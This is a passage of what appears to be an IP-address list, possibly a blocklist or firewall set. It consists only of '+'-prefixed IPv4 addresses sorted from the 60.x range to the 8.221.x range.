+60.219.117.186 +60.22.74.67 +60.22.87.223 +60.220.176.32 +60.221.224.220 +60.221.58.77 +60.222.238.115 +60.222.244.89 +60.223.252.57 +60.225.160.190 +60.23.54.94 +60.242.84.249 +60.246.13.211 +60.246.211.22 +60.246.221.192 +60.247.156.29 +60.247.32.126 +60.247.92.186 +60.248.154.93 +60.248.157.175 +60.248.96.107 +60.249.142.25 +60.249.142.26 +60.249.215.4 +60.250.193.246 +60.250.193.82 +60.250.198.138 +60.250.229.44 +60.250.81.51 +60.251.120.199 +60.251.190.130 +60.251.193.249 +60.255.240.205 +60.255.240.242 +60.28.24.243 +60.28.39.166 +60.28.59.242 +60.29.127.226 +60.31.181.219 +60.31.181.52 +60.31.206.18 +60.31.215.246 +60.34.6.204 +60.49.126.193 +60.50.188.168 +60.50.226.100 +60.51.59.9 +60.53.226.62 +60.54.179.49 +60.67.100.175 +60.8.59.58 +61.105.25.52 +61.108.83.139 +61.12.243.91 +61.131.46.146 +61.134.69.41 +61.139.119.50 +61.141.224.191 +61.145.163.164 +61.145.177.7 +61.145.181.7 +61.147.204.98 +61.147.209.31 +61.149.169.70 +61.149.46.30 +61.152.124.178 +61.153.184.151 +61.153.184.30 +61.153.186.36 +61.153.187.238 +61.153.190.174 +61.153.191.162 +61.153.208.38 +61.154.122.122 +61.155.106.101 +61.156.14.71 +61.164.202.218 +61.168.150.2 +61.169.149.171 +61.169.54.150 +61.170.208.116 +61.171.107.54 +61.171.2.126 +61.171.39.192 +61.171.46.131 +61.171.48.20 +61.171.52.116 +61.171.64.43 +61.171.68.198 +61.171.81.192 +61.171.81.99 +61.171.86.70 +61.171.92.119 +61.177.143.218 +61.178.160.115 +61.178.229.202 +61.180.77.124 +61.183.20.193 +61.183.20.213 +61.183.225.72 +61.183.8.43 +61.184.119.61 +61.184.176.231 +61.184.199.12 +61.184.199.14 +61.184.24.249 +61.186.159.26 +61.188.178.199 +61.188.205.76 +61.190.114.203 +61.191.103.17 +61.191.130.198 +61.205.224.157 +61.216.108.211 +61.216.14.137 +61.216.166.135 +61.218.122.186 +61.218.247.139 +61.219.171.109 +61.219.228.8 +61.22.75.207 +61.220.251.144 +61.220.44.44 +61.220.69.14 +61.221.204.34 +61.221.219.150 +61.221.30.246 +61.222.211.114 +61.222.80.232 +61.223.133.243 +61.240.156.12 +61.240.156.16 +61.240.17.66 +61.240.213.169 +61.240.29.186 +61.242.144.194 +61.245.152.77 +61.246.38.5 +61.246.6.91 +61.247.249.10 +61.30.72.127 +61.31.104.40 +61.33.192.227 +61.43.117.151 +61.49.49.134 +61.51.184.194 +61.51.81.78 +61.56.182.218 +61.58.188.58 +61.63.157.155 +61.72.157.39 +61.72.55.130 +61.72.59.106 +61.73.167.139 +61.73.233.80 +61.74.148.176 +61.75.14.205 +61.77.141.123 +61.77.165.12 +61.77.96.201 +61.79.235.134 +61.80.100.235 +61.80.110.108 +61.80.161.148 +61.80.179.118 +61.80.237.204 +61.81.151.97 +61.82.174.40 +61.82.27.253 +61.82.69.82 +61.82.94.1 +61.83.113.14 +61.83.148.125 +61.83.214.116 +61.83.219.209 +61.83.254.100 +61.83.57.41 +61.84.20.198 +61.85.0.212 +61.85.12.3 +61.85.190.52 +61.85.213.199 +61.85.244.147 +61.85.9.139 +61.92.58.210 +61.93.186.125 +61.99.254.192 +62.103.246.199 +62.105.156.58 +62.122.184.11 +62.122.184.221 +62.122.184.252 +62.133.165.168 +62.150.236.203 +62.152.34.213 +62.169.20.214 +62.171.154.38 +62.171.166.204 +62.173.149.72 +62.182.116.64 +62.192.226.83 +62.193.106.227 +62.20.158.193 +62.201.75.8 +62.204.134.142 +62.204.41.106 +62.204.41.57 +62.210.125.190 +62.210.136.165 +62.210.185.4 +62.210.245.229 +62.219.62.46 +62.232.121.52 +62.249.97.55 +62.28.222.221 +62.3.58.88 +62.31.86.246 +62.33.134.177 +62.33.29.5 +62.36.40.105 +62.60.188.125 +62.60.188.242 +62.60.190.7 +62.60.214.163 +62.60.221.29 +62.60.233.6 +62.76.95.152 +62.80.190.237 +62.84.180.30 +62.97.36.123 +62.99.74.172 +63.143.99.121 +63.41.183.16 +63.65.203.82 +64.119.31.49 +64.176.15.86 +64.20.136.43 +64.222.163.211 +64.225.1.125 +64.225.11.226 +64.225.120.15 +64.225.17.80 +64.225.74.178 +64.225.98.83 +64.226.103.55 +64.226.105.67 +64.226.110.29 +64.226.112.150 +64.226.112.77 +64.226.76.225 +64.226.76.4 +64.226.79.183 +64.226.86.7 +64.226.95.27 +64.227.1.212 +64.227.105.79 +64.227.106.112 +64.227.130.24 +64.227.132.21 +64.227.133.133 +64.227.141.226 +64.227.143.96 +64.227.144.204 +64.227.145.217 +64.227.146.163 +64.227.146.23 +64.227.146.243 +64.227.147.33 +64.227.148.8 +64.227.149.214 +64.227.150.252 +64.227.153.29 +64.227.156.126 +64.227.156.216 +64.227.158.157 +64.227.166.140 +64.227.170.218 +64.227.174.243 +64.227.177.112 +64.227.185.138 +64.227.35.68 +64.227.40.101 +64.227.40.49 +64.227.41.138 +64.227.74.69 +64.227.99.233 +64.23.129.165 +64.23.178.20 +64.23.182.57 +64.23.192.73 +64.23.206.49 +64.23.213.230 +64.23.232.77 +64.23.255.107 +64.235.40.162 +64.62.156.10 +64.62.156.100 +64.62.156.101 +64.62.156.102 +64.62.156.103 +64.62.156.104 +64.62.156.105 +64.62.156.106 +64.62.156.107 +64.62.156.108 +64.62.156.109 +64.62.156.11 +64.62.156.110 +64.62.156.111 +64.62.156.112 +64.62.156.113 +64.62.156.114 +64.62.156.115 +64.62.156.116 +64.62.156.117 +64.62.156.118 +64.62.156.119 +64.62.156.12 +64.62.156.120 +64.62.156.121 +64.62.156.13 +64.62.156.14 +64.62.156.15 +64.62.156.16 +64.62.156.17 +64.62.156.18 +64.62.156.19 +64.62.156.20 +64.62.156.21 +64.62.156.22 +64.62.156.23 +64.62.156.24 +64.62.156.25 +64.62.156.26 +64.62.156.27 +64.62.156.28 +64.62.156.29 +64.62.156.30 +64.62.156.31 +64.62.156.32 +64.62.156.33 +64.62.156.34 +64.62.156.35 +64.62.156.36 +64.62.156.37 +64.62.156.38 +64.62.156.39 +64.62.156.40 +64.62.156.41 +64.62.156.42 +64.62.156.43 +64.62.156.44 +64.62.156.45 +64.62.156.46 +64.62.156.47 +64.62.156.48 +64.62.156.49 +64.62.156.50 +64.62.156.51 +64.62.156.52 +64.62.156.53 +64.62.156.54 +64.62.156.55 +64.62.156.56 +64.62.156.57 +64.62.156.58 +64.62.156.59 +64.62.156.60 +64.62.156.61 +64.62.156.62 +64.62.156.63 +64.62.156.64 +64.62.156.65 +64.62.156.66 +64.62.156.67 +64.62.156.68 +64.62.156.69 +64.62.156.70 +64.62.156.71 +64.62.156.72 +64.62.156.73 +64.62.156.74 +64.62.156.75 +64.62.156.76 +64.62.156.77 +64.62.156.78 +64.62.156.79 +64.62.156.80 +64.62.156.81 +64.62.156.82 +64.62.156.83 +64.62.156.84 +64.62.156.85 +64.62.156.86 +64.62.156.87 +64.62.156.88 +64.62.156.89 +64.62.156.90 +64.62.156.91 +64.62.156.92 +64.62.156.93 +64.62.156.94 +64.62.156.95 +64.62.156.96 +64.62.156.97 +64.62.156.98 +64.62.156.99 +64.62.197.100 +64.62.197.101 +64.62.197.102 +64.62.197.103 +64.62.197.105 +64.62.197.106 +64.62.197.108 +64.62.197.11 +64.62.197.111 +64.62.197.112 +64.62.197.113 +64.62.197.114 +64.62.197.118 +64.62.197.119 +64.62.197.120 +64.62.197.122 +64.62.197.123 +64.62.197.124 +64.62.197.126 +64.62.197.127 +64.62.197.128 +64.62.197.130 +64.62.197.131 +64.62.197.132 +64.62.197.133 +64.62.197.134 +64.62.197.136 +64.62.197.137 +64.62.197.138 +64.62.197.14 +64.62.197.140 +64.62.197.142 +64.62.197.144 +64.62.197.145 +64.62.197.146 +64.62.197.147 +64.62.197.150 +64.62.197.151 +64.62.197.152 +64.62.197.153 +64.62.197.154 +64.62.197.156 +64.62.197.157 +64.62.197.159 +64.62.197.16 +64.62.197.161 +64.62.197.162 +64.62.197.164 +64.62.197.165 +64.62.197.166 +64.62.197.167 +64.62.197.168 +64.62.197.17 +64.62.197.170 +64.62.197.173 +64.62.197.174 +64.62.197.176 +64.62.197.177 +64.62.197.18 +64.62.197.183 +64.62.197.184 +64.62.197.185 +64.62.197.186 +64.62.197.187 +64.62.197.188 +64.62.197.189 +64.62.197.19 +64.62.197.190 +64.62.197.191 +64.62.197.192 +64.62.197.193 +64.62.197.195 +64.62.197.196 +64.62.197.198 +64.62.197.204 +64.62.197.205 +64.62.197.207 +64.62.197.211 +64.62.197.213 +64.62.197.214 +64.62.197.215 +64.62.197.216 +64.62.197.217 +64.62.197.22 +64.62.197.221 +64.62.197.223 +64.62.197.224 +64.62.197.227 +64.62.197.228 +64.62.197.229 +64.62.197.23 +64.62.197.232 +64.62.197.233 +64.62.197.235 +64.62.197.237 +64.62.197.238 +64.62.197.239 +64.62.197.24 +64.62.197.241 +64.62.197.27 +64.62.197.3 +64.62.197.30 +64.62.197.31 +64.62.197.32 +64.62.197.33 +64.62.197.35 +64.62.197.36 +64.62.197.37 +64.62.197.38 +64.62.197.39 +64.62.197.40 +64.62.197.42 +64.62.197.43 +64.62.197.44 +64.62.197.45 +64.62.197.46 +64.62.197.48 +64.62.197.50 +64.62.197.52 +64.62.197.54 +64.62.197.55 +64.62.197.57 +64.62.197.58 +64.62.197.59 +64.62.197.64 +64.62.197.65 +64.62.197.66 +64.62.197.68 +64.62.197.69 +64.62.197.70 +64.62.197.71 +64.62.197.72 +64.62.197.73 +64.62.197.74 +64.62.197.75 +64.62.197.76 +64.62.197.77 +64.62.197.78 +64.62.197.79 +64.62.197.8 +64.62.197.81 +64.62.197.82 +64.62.197.84 +64.62.197.85 +64.62.197.86 +64.62.197.87 +64.62.197.88 +64.62.197.89 +64.62.197.9 +64.62.197.91 +64.62.197.92 +64.62.197.93 +64.62.197.98 +64.62.197.99 +64.64.226.178 +64.67.125.148 +64.67.152.187 +64.68.228.48 +64.90.58.242 +64.98.193.92 +64.98.195.50 +65.108.147.213 +65.108.209.191 +65.181.91.6 +65.181.95.241 +65.190.102.227 +65.20.131.175 +65.20.133.4 +65.20.135.147 +65.20.142.89 +65.20.154.37 +65.20.155.223 +65.20.162.105 +65.20.169.231 +65.20.170.34 +65.20.171.62 +65.20.173.108 +65.20.183.209 +65.20.185.121 +65.20.188.92 +65.20.191.52 +65.20.194.206 +65.20.195.250 +65.20.199.144 +65.20.204.76 +65.20.205.73 +65.20.226.75 +65.20.249.180 +65.20.250.71 +65.20.251.53 +65.242.201.202 +65.49.1.10 +65.49.1.100 +65.49.1.101 +65.49.1.102 +65.49.1.103 +65.49.1.104 +65.49.1.105 +65.49.1.106 +65.49.1.107 +65.49.1.108 +65.49.1.109 +65.49.1.11 +65.49.1.110 +65.49.1.111 +65.49.1.112 +65.49.1.113 +65.49.1.114 +65.49.1.115 +65.49.1.116 +65.49.1.117 +65.49.1.118 +65.49.1.119 +65.49.1.12 +65.49.1.120 +65.49.1.121 +65.49.1.13 +65.49.1.14 +65.49.1.15 +65.49.1.16 +65.49.1.17 +65.49.1.18 +65.49.1.19 +65.49.1.20 +65.49.1.21 +65.49.1.22 +65.49.1.23 +65.49.1.24 +65.49.1.25 +65.49.1.26 +65.49.1.27 +65.49.1.28 +65.49.1.29 +65.49.1.30 +65.49.1.31 +65.49.1.32 +65.49.1.33 +65.49.1.34 +65.49.1.35 +65.49.1.36 +65.49.1.37 +65.49.1.38 +65.49.1.39 +65.49.1.40 +65.49.1.41 +65.49.1.42 +65.49.1.43 +65.49.1.44 +65.49.1.45 +65.49.1.46 +65.49.1.47 +65.49.1.48 +65.49.1.49 +65.49.1.50 +65.49.1.51 +65.49.1.52 +65.49.1.53 +65.49.1.54 +65.49.1.55 +65.49.1.56 +65.49.1.57 +65.49.1.58 +65.49.1.59 +65.49.1.60 +65.49.1.61 +65.49.1.62 +65.49.1.63 +65.49.1.64 +65.49.1.65 +65.49.1.66 +65.49.1.67 +65.49.1.68 +65.49.1.69 +65.49.1.70 +65.49.1.71 +65.49.1.72 +65.49.1.73 +65.49.1.74 +65.49.1.75 +65.49.1.76 +65.49.1.77 +65.49.1.78 +65.49.1.79 +65.49.1.80 +65.49.1.81 +65.49.1.82 +65.49.1.83 +65.49.1.84 +65.49.1.85 +65.49.1.86 +65.49.1.87 +65.49.1.88 +65.49.1.89 +65.49.1.90 +65.49.1.91 +65.49.1.92 +65.49.1.93 +65.49.1.94 +65.49.1.95 +65.49.1.96 +65.49.1.98 +65.49.1.99 +65.49.196.227 +65.49.20.100 +65.49.20.101 +65.49.20.102 +65.49.20.103 +65.49.20.104 +65.49.20.105 +65.49.20.106 +65.49.20.107 +65.49.20.108 +65.49.20.109 +65.49.20.110 +65.49.20.111 +65.49.20.112 +65.49.20.114 +65.49.20.115 +65.49.20.116 +65.49.20.117 +65.49.20.118 +65.49.20.119 +65.49.20.120 +65.49.20.121 +65.49.20.122 +65.49.20.123 +65.49.20.124 +65.49.20.125 +65.49.20.126 +65.49.20.66 +65.49.20.67 +65.49.20.68 +65.49.20.69 +65.49.20.70 +65.49.20.71 +65.49.20.72 +65.49.20.74 +65.49.20.75 +65.49.20.77 +65.49.20.78 +65.49.20.79 +65.49.20.80 +65.49.20.81 +65.49.20.82 +65.49.20.83 +65.49.20.84 +65.49.20.85 +65.49.20.86 +65.49.20.87 +65.49.20.88 +65.49.20.89 +65.49.20.90 +65.49.20.91 +65.49.20.93 +65.49.20.94 +65.49.20.95 +65.49.20.96 +65.49.20.97 +65.49.20.98 +65.49.20.99 +65.49.235.175 +65.60.193.68 +65.76.136.106 +66.103.198.67 +66.103.222.217 +66.128.15.1 +66.170.213.245 +66.175.213.4 +66.176.120.198 +66.186.252.69 +66.203.138.227 +66.212.129.2 +66.228.32.147 +66.228.55.88 +66.234.94.93 +66.240.192.138 +66.240.205.34 +66.240.219.146 +66.240.223.202 +66.240.236.109 +66.240.236.116 +66.240.236.119 +66.29.131.127 +66.58.142.237 +66.59.196.9 +66.61.58.68 +66.66.116.251 +66.70.170.213 +66.70.170.27 +66.70.181.5 +66.94.103.132 +66.96.195.132 +67.10.186.214 +67.159.233.146 +67.167.129.112 +67.205.129.74 +67.205.132.176 +67.205.138.101 +67.205.145.132 +67.205.147.39 +67.205.160.228 +67.205.180.254 +67.207.87.249 +67.207.88.210 +67.207.89.81 +67.207.91.0 +67.207.94.128 +67.207.95.230 +67.211.209.235 +67.212.49.3 +67.241.135.25 +67.49.74.72 +67.53.114.86 +67.55.84.19 +67.60.128.211 +67.60.211.114 +67.80.187.116 +68.116.41.2 +68.132.44.182 +68.15.18.147 +68.168.142.91 +68.178.160.133 +68.178.164.152 +68.178.165.200 +68.178.165.225 +68.178.166.155 +68.178.166.166 +68.183.108.31 +68.183.118.102 +68.183.126.228 +68.183.133.144 +68.183.133.202 +68.183.137.128 +68.183.142.21 +68.183.15.177 +68.183.155.11 +68.183.155.223 +68.183.17.84 +68.183.17.85 +68.183.176.218 +68.183.180.246 +68.183.184.180 +68.183.191.94 +68.183.193.113 +68.183.20.84 +68.183.22.195 +68.183.22.71 +68.183.223.200 +68.183.232.239 +68.183.234.223 +68.183.238.220 +68.183.60.2 +68.183.71.20 +68.183.79.13 +68.183.80.132 +68.183.85.160 +68.183.87.33 +68.183.88.186 +68.183.93.88 +68.183.95.138 +68.190.218.66 +68.192.140.75 +68.195.248.204 +68.197.147.150 +68.197.147.158 +68.204.225.239 +68.225.87.54 +68.233.116.124 +68.36.127.214 +68.36.67.30 +68.41.118.242 +68.43.52.181 +68.46.78.162 +68.51.57.46 +68.64.170.1 +68.69.186.102 +68.69.186.182 +68.70.209.158 +68.78.33.105 +68.82.43.95 +69.124.10.62 +69.127.122.37 +69.143.26.21 +69.163.182.194 +69.164.202.204 +69.164.214.243 +69.164.216.86 +69.164.217.245 +69.164.217.74 +69.164.219.77 +69.165.131.129 +69.207.166.243 +69.49.229.5 +69.49.229.80 +69.49.245.160 +69.49.246.102 +69.49.246.187 +69.49.247.178 +69.49.247.81 +69.49.247.85 +69.70.223.18 +69.85.121.121 +69.87.207.133 +69.88.201.17 +70.118.110.149 +70.118.112.230 +70.123.236.52 +70.166.176.213 +70.166.207.76 +70.166.97.197 +70.169.48.184 +70.169.6.50 +70.171.206.63 +70.174.93.242 +70.175.171.194 +70.176.112.44 +70.182.130.92 +70.184.86.117 +70.185.241.22 +70.22.149.55 +70.32.74.232 +70.54.182.130 +70.67.112.115 +70.73.124.136 +70.77.225.190 +70.89.116.5 +70.95.196.25 +71.128.32.25 +71.163.138.243 +71.163.52.89 +71.187.91.117 +71.194.92.197 +71.239.172.126 +71.250.87.99 +71.28.71.215 +71.31.148.40 +71.31.16.20 +71.31.18.64 +71.56.232.28 +71.6.134.230 +71.6.134.231 +71.6.134.232 +71.6.134.233 +71.6.134.234 +71.6.134.235 +71.6.135.131 +71.6.146.130 +71.6.146.185 +71.6.146.186 +71.6.147.254 +71.6.158.166 +71.6.165.200 +71.6.167.142 +71.6.199.23 +71.6.232.20 +71.6.232.22 +71.6.232.23 +71.6.232.24 +71.6.232.25 +71.6.232.26 +71.6.232.27 +71.6.232.28 +71.62.34.216 +71.78.204.218 +71.86.89.235 +71.90.30.53 +71.93.178.9 +72.13.186.164 +72.134.3.252 +72.167.32.109 +72.167.42.160 +72.167.44.240 +72.167.46.207 +72.167.46.30 +72.167.55.58 +72.211.51.84 +72.24.32.60 +72.240.121.31 +72.240.125.133 +72.240.213.64 +72.255.231.165 +72.255.242.205 +72.255.49.34 +72.29.73.171 +72.35.180.185 +72.48.104.121 +72.49.49.11 +72.68.34.246 +72.69.49.62 +72.75.250.21 +72.76.194.159 +72.80.117.17 +72.82.230.42 +72.9.145.44 +72.90.84.59 +72.90.84.60 +73.0.255.243 +73.102.224.54 +73.135.119.72 +73.135.38.134 +73.148.29.153 +73.163.34.222 +73.17.235.113 +73.179.114.130 +73.199.208.99 +73.211.34.234 +73.211.42.199 +73.214.14.202 +73.22.122.192 +73.222.170.58 +73.249.54.224 +73.45.216.101 +73.5.193.236 +73.55.79.123 +73.75.163.34 +73.79.248.144 +73.85.63.213 +73.92.192.17 +74.108.47.184 +74.116.59.101 +74.120.221.122 +74.121.148.226 +74.121.151.106 +74.126.45.133 +74.193.205.159 +74.207.231.152 +74.207.231.22 +74.207.253.22 +74.208.177.56 +74.219.127.52 +74.225.198.160 +74.225.200.253 +74.225.201.145 +74.225.253.167 +74.234.146.205 +74.249.18.64 +74.40.19.68 +74.48.66.231 +74.62.59.2 +74.82.195.39 +74.82.47.10 +74.82.47.11 +74.82.47.12 +74.82.47.13 +74.82.47.14 +74.82.47.15 +74.82.47.16 +74.82.47.17 +74.82.47.18 +74.82.47.2 +74.82.47.20 +74.82.47.21 +74.82.47.22 +74.82.47.23 +74.82.47.24 +74.82.47.25 +74.82.47.26 +74.82.47.28 +74.82.47.29 +74.82.47.3 +74.82.47.30 +74.82.47.31 +74.82.47.32 +74.82.47.33 +74.82.47.34 +74.82.47.35 +74.82.47.36 +74.82.47.37 +74.82.47.39 +74.82.47.4 +74.82.47.40 +74.82.47.41 +74.82.47.42 +74.82.47.43 +74.82.47.44 +74.82.47.45 +74.82.47.46 +74.82.47.47 +74.82.47.48 +74.82.47.49 +74.82.47.5 +74.82.47.50 +74.82.47.51 +74.82.47.52 +74.82.47.53 +74.82.47.54 +74.82.47.55 +74.82.47.56 +74.82.47.57 +74.82.47.58 +74.82.47.59 +74.82.47.6 +74.82.47.60 +74.82.47.61 +74.82.47.62 +74.82.47.7 +74.82.47.8 +74.82.47.9 +74.90.213.28 +74.94.234.151 +74.95.13.185 +75.102.141.123 +75.102.141.124 +75.103.212.158 +75.110.132.41 +75.110.183.218 +75.110.69.42 +75.111.127.36 +75.111.84.251 +75.119.153.206 +75.129.96.217 +75.134.58.94 +75.138.40.55 +75.144.185.110 +75.148.215.54 +75.83.225.98 +75.89.173.221 +75.91.227.75 +76.104.243.125 +76.11.185.195 +76.11.71.17 +76.132.238.43 +76.133.203.2 +76.136.164.157 +76.14.125.250 +76.150.112.245 +76.168.161.111 +76.169.118.90 +76.176.207.24 +76.176.252.225 +76.187.35.156 +76.230.232.228 +76.53.93.123 +76.72.14.152 +76.77.23.11 +76.82.171.69 +76.90.101.144 +76.92.209.141 +76.93.228.238 +77.103.227.114 +77.104.235.188 +77.106.101.197 +77.106.78.215 +77.106.79.24 +77.108.108.131 +77.127.219.80 +77.137.41.62 +77.151.94.75 +77.157.174.51 +77.163.207.12 +77.163.94.85 +77.187.54.221 +77.189.197.125 +77.206.164.56 +77.211.21.83 +77.220.196.253 +77.221.138.170 +77.221.138.241 +77.221.156.122 +77.221.158.210 +77.221.158.215 +77.221.158.250 +77.222.187.73 +77.222.53.207 +77.223.96.136 +77.232.142.143 +77.232.142.189 +77.237.233.60 +77.239.216.230 +77.239.218.190 +77.242.225.38 +77.244.111.46 +77.249.255.25 +77.251.191.48 +77.26.209.123 +77.36.167.37 +77.37.134.97 +77.37.136.47 +77.37.169.43 +77.37.170.195 +77.37.225.184 +77.37.246.239 +77.37.96.100 +77.38.208.176 +77.44.13.15 +77.51.214.170 +77.52.19.44 +77.53.106.55 +77.53.24.3 +77.53.43.224 +77.58.74.148 +77.61.64.143 +77.68.74.164 +77.69.173.197 +77.69.31.6 +77.73.131.144 +77.79.188.13 +77.81.142.57 +77.82.84.12 +77.82.90.210 +77.85.243.55 +77.85.247.48 +77.85.4.78 +77.85.52.109 +77.90.185.52 +77.90.22.35 +77.91.78.115 +77.91.84.54 +77.93.47.126 +77.94.124.90 +77.95.11.190 +77.95.185.179 +77.95.89.53 +77.95.90.172 +78.102.47.232 +78.107.236.240 +78.107.255.164 +78.108.177.50 +78.108.177.51 +78.109.200.147 +78.109.206.183 +78.110.121.88 +78.110.254.175 +78.111.17.216 +78.111.2.100 +78.128.113.102 +78.128.113.250 +78.128.113.38 +78.128.113.74 +78.128.113.98 +78.128.114.2 +78.135.76.132 +78.136.201.201 +78.139.75.27 +78.140.48.91 +78.140.58.48 +78.142.18.219 +78.142.37.39 +78.144.107.247 +78.144.119.122 +78.153.130.75 +78.153.140.176 +78.153.140.177 +78.153.140.178 +78.153.140.218 +78.153.140.222 +78.153.140.223 +78.153.140.224 +78.156.133.24 +78.177.242.240 +78.179.0.23 +78.184.222.201 +78.186.151.102 +78.186.24.210 +78.186.54.65 +78.187.145.101 +78.187.20.204 +78.187.204.181 +78.187.21.105 +78.187.45.63 +78.188.109.126 +78.188.139.71 +78.188.197.18 +78.188.237.65 +78.189.176.188 +78.189.227.173 +78.189.238.167 +78.189.47.153 +78.193.233.61 +78.196.177.233 +78.199.166.14 +78.29.36.245 +78.36.196.213 +78.38.46.93 +78.4.254.135 +78.56.247.112 +78.73.119.202 +78.73.70.43 +78.78.201.183 +78.82.92.234 +78.83.167.147 +78.84.163.117 +78.85.19.151 +78.85.23.138 +78.85.23.245 +78.87.246.52 +78.94.76.242 +78.96.1.77 +79.0.123.135 +79.104.0.82 +79.107.129.224 +79.11.254.208 +79.110.62.117 +79.110.62.130 +79.110.62.138 +79.110.62.147 +79.110.62.148 +79.110.62.149 +79.110.62.150 +79.110.62.152 +79.110.62.159 +79.110.62.161 +79.110.62.162 +79.110.62.166 +79.110.62.17 +79.110.62.172 +79.110.62.175 +79.110.62.176 +79.110.62.177 +79.110.62.183 +79.110.62.195 +79.110.62.197 +79.110.62.198 +79.110.62.199 +79.110.62.20 +79.110.62.21 +79.110.62.212 +79.110.62.213 +79.110.62.241 +79.110.62.245 +79.110.62.34 +79.110.62.39 +79.110.62.40 +79.110.62.49 +79.110.62.71 +79.110.62.92 +79.110.62.93 +79.111.0.58 +79.111.13.178 +79.116.182.45 +79.116.43.98 +79.117.224.183 +79.117.59.247 +79.117.7.241 +79.120.68.4 +79.120.74.12 +79.124.49.94 +79.124.56.254 +79.124.58.18 +79.124.60.218 +79.124.62.122 +79.124.62.126 +79.124.62.134 +79.124.62.54 +79.124.62.59 +79.124.62.62 +79.124.62.74 +79.127.85.197 +79.129.28.177 +79.131.141.226 +79.131.4.131 +79.131.92.170 +79.132.125.226 +79.136.14.233 +79.137.197.11 +79.137.198.143 +79.137.199.156 +79.137.206.201 +79.137.7.64 +79.137.7.65 +79.137.7.66 +79.137.7.67 +79.137.7.68 +79.137.7.69 +79.137.7.70 +79.137.7.71 +79.137.7.72 +79.137.7.73 +79.137.7.74 +79.137.7.75 +79.137.7.76 +79.137.7.77 +79.137.7.78 +79.137.7.79 +79.138.42.38 +79.143.187.9 +79.143.31.104 +79.143.34.42 +79.143.88.94 +79.164.57.122 +79.171.117.82 +79.171.117.83 +79.175.128.161 +79.175.176.225 +79.18.122.26 +79.184.73.42 +79.224.111.41 +79.25.135.185 +79.27.137.69 +79.27.94.239 +79.3.96.178 +79.40.64.194 +79.44.213.55 +79.7.184.147 +79.7.197.84 +79.72.57.194 +79.78.232.3 +79.78.80.13 +79.9.119.24 +79.9.49.107 +79.99.41.30 +8.130.100.234 +8.130.100.51 +8.130.102.128 +8.130.47.121 +8.130.90.5 +8.130.94.184 +8.134.114.212 +8.134.159.4 +8.134.160.152 +8.134.174.114 +8.134.175.158 +8.134.36.177 +8.135.103.130 +8.137.10.216 +8.137.106.100 +8.137.115.69 +8.137.12.155 +8.137.20.54 +8.137.55.67 +8.138.154.105 +8.138.155.88 +8.140.190.96 +8.140.250.89 +8.142.113.39 +8.142.114.147 +8.142.14.109 +8.142.142.89 +8.142.167.234 +8.142.19.29 +8.142.215.78 +8.142.30.77 +8.142.98.112 +8.149.135.25 +8.20.22.58 +8.208.10.94 +8.208.79.61 +8.209.74.10 +8.209.82.97 +8.209.83.9 +8.209.90.19 +8.209.91.228 +8.209.96.179 +8.209.96.247 +8.209.96.38 +8.209.97.27 +8.210.121.84 +8.210.133.162 +8.210.174.140 +8.210.214.160 +8.210.22.143 +8.210.79.22 +8.211.199.102 +8.211.33.23 +8.211.37.65 +8.211.38.50 +8.211.39.215 +8.211.39.61 +8.211.41.141 +8.211.42.134 +8.211.42.24 +8.211.42.32 +8.211.42.91 +8.211.43.157 +8.211.43.53 +8.211.44.115 +8.211.44.141 +8.211.44.144 +8.211.44.197 +8.211.45.194 +8.211.45.218 +8.211.45.42 +8.211.46.204 +8.211.46.224 +8.211.46.254 +8.211.46.74 +8.211.46.83 +8.211.47.162 +8.211.47.177 +8.211.47.185 +8.211.47.19 +8.211.47.212 +8.211.47.221 +8.211.47.67 +8.211.48.8 +8.211.49.185 +8.211.49.3 +8.211.50.131 +8.211.50.175 +8.211.50.226 +8.211.51.118 +8.211.51.119 +8.211.51.135 +8.211.51.146 +8.211.51.16 +8.211.51.163 +8.211.51.182 +8.211.51.190 +8.211.51.235 +8.211.51.34 +8.211.51.66 +8.211.52.110 +8.211.52.116 +8.211.52.121 +8.211.52.127 +8.211.52.151 +8.211.52.176 +8.211.52.18 +8.211.52.48 +8.211.52.6 +8.211.52.80 +8.213.129.190 +8.213.134.56 +8.213.32.171 +8.213.33.170 +8.215.19.100 +8.215.24.255 +8.215.3.241 +8.215.44.45 +8.215.45.59 +8.216.120.128 +8.216.121.252 +8.216.122.131 +8.216.122.147 +8.216.127.123 +8.216.65.159 +8.216.65.177 +8.216.65.225 +8.216.66.154 +8.216.66.248 +8.216.67.37 +8.216.80.75 +8.216.82.111 +8.216.85.239 +8.216.86.85 +8.216.87.143 +8.216.87.215 +8.216.87.246 +8.216.87.81 +8.216.91.175 +8.216.92.182 +8.216.95.92 +8.217.10.15 +8.217.110.184 +8.217.128.3 +8.217.145.55 +8.217.154.88 +8.217.180.105 +8.217.200.138 +8.217.222.53 +8.217.232.213 +8.217.249.52 +8.217.250.173 +8.217.3.8 +8.217.69.139 +8.217.78.51 +8.217.8.87 +8.217.86.49 +8.217.98.216 +8.218.0.152 +8.218.10.30 +8.218.107.73 +8.218.12.181 +8.218.133.9 +8.218.15.254 +8.218.150.163 +8.218.154.239 +8.218.177.5 +8.218.180.216 +8.218.203.129 +8.218.89.123 +8.219.120.50 +8.219.147.10 +8.219.148.168 +8.219.148.39 +8.219.157.124 +8.219.157.156 +8.219.163.225 +8.219.164.91 +8.219.168.69 +8.219.181.180 +8.219.182.10 +8.219.189.216 +8.219.208.138 +8.219.209.122 +8.219.216.114 +8.219.222.66 +8.219.230.175 +8.219.231.116 +8.219.231.242 +8.219.231.90 +8.219.232.90 +8.219.236.201 +8.219.238.25 +8.219.239.191 +8.219.243.250 +8.219.246.0 +8.219.248.225 +8.219.250.34 +8.219.251.123 +8.219.251.4 +8.219.252.228 +8.219.253.14 +8.219.4.1 +8.219.48.65 +8.219.59.96 +8.219.61.177 +8.219.63.72 +8.219.8.175 +8.219.8.46 +8.219.82.161 +8.219.9.139 +8.219.94.62 +8.219.99.214 +8.220.197.214 +8.220.201.94 +8.220.209.119 +8.220.210.24 +8.220.240.109 +8.220.241.245 +8.221.136.154 +8.221.136.170 +8.221.136.235 +8.221.136.246 +8.221.136.6 +8.221.136.98 +8.221.137.163 +8.221.137.196 +8.221.137.208 +8.221.137.226 +8.221.137.58 +8.221.138.102 +8.221.138.135 +8.221.138.209 +8.221.138.213 +8.221.138.237 +8.221.139.116 +8.221.139.21 +8.221.139.48 +8.221.139.8 +8.221.140.212 +8.221.140.220 +8.221.140.221 +8.221.140.46 +8.221.140.90 +8.221.141.128 +8.221.141.131 +8.221.141.145 +8.221.141.164 +8.221.141.167 +8.221.141.179 +8.221.141.183 +8.221.141.186 +8.221.141.224 +8.221.141.254 +8.221.141.33 +8.221.141.40 +8.221.142.106 +8.221.142.108 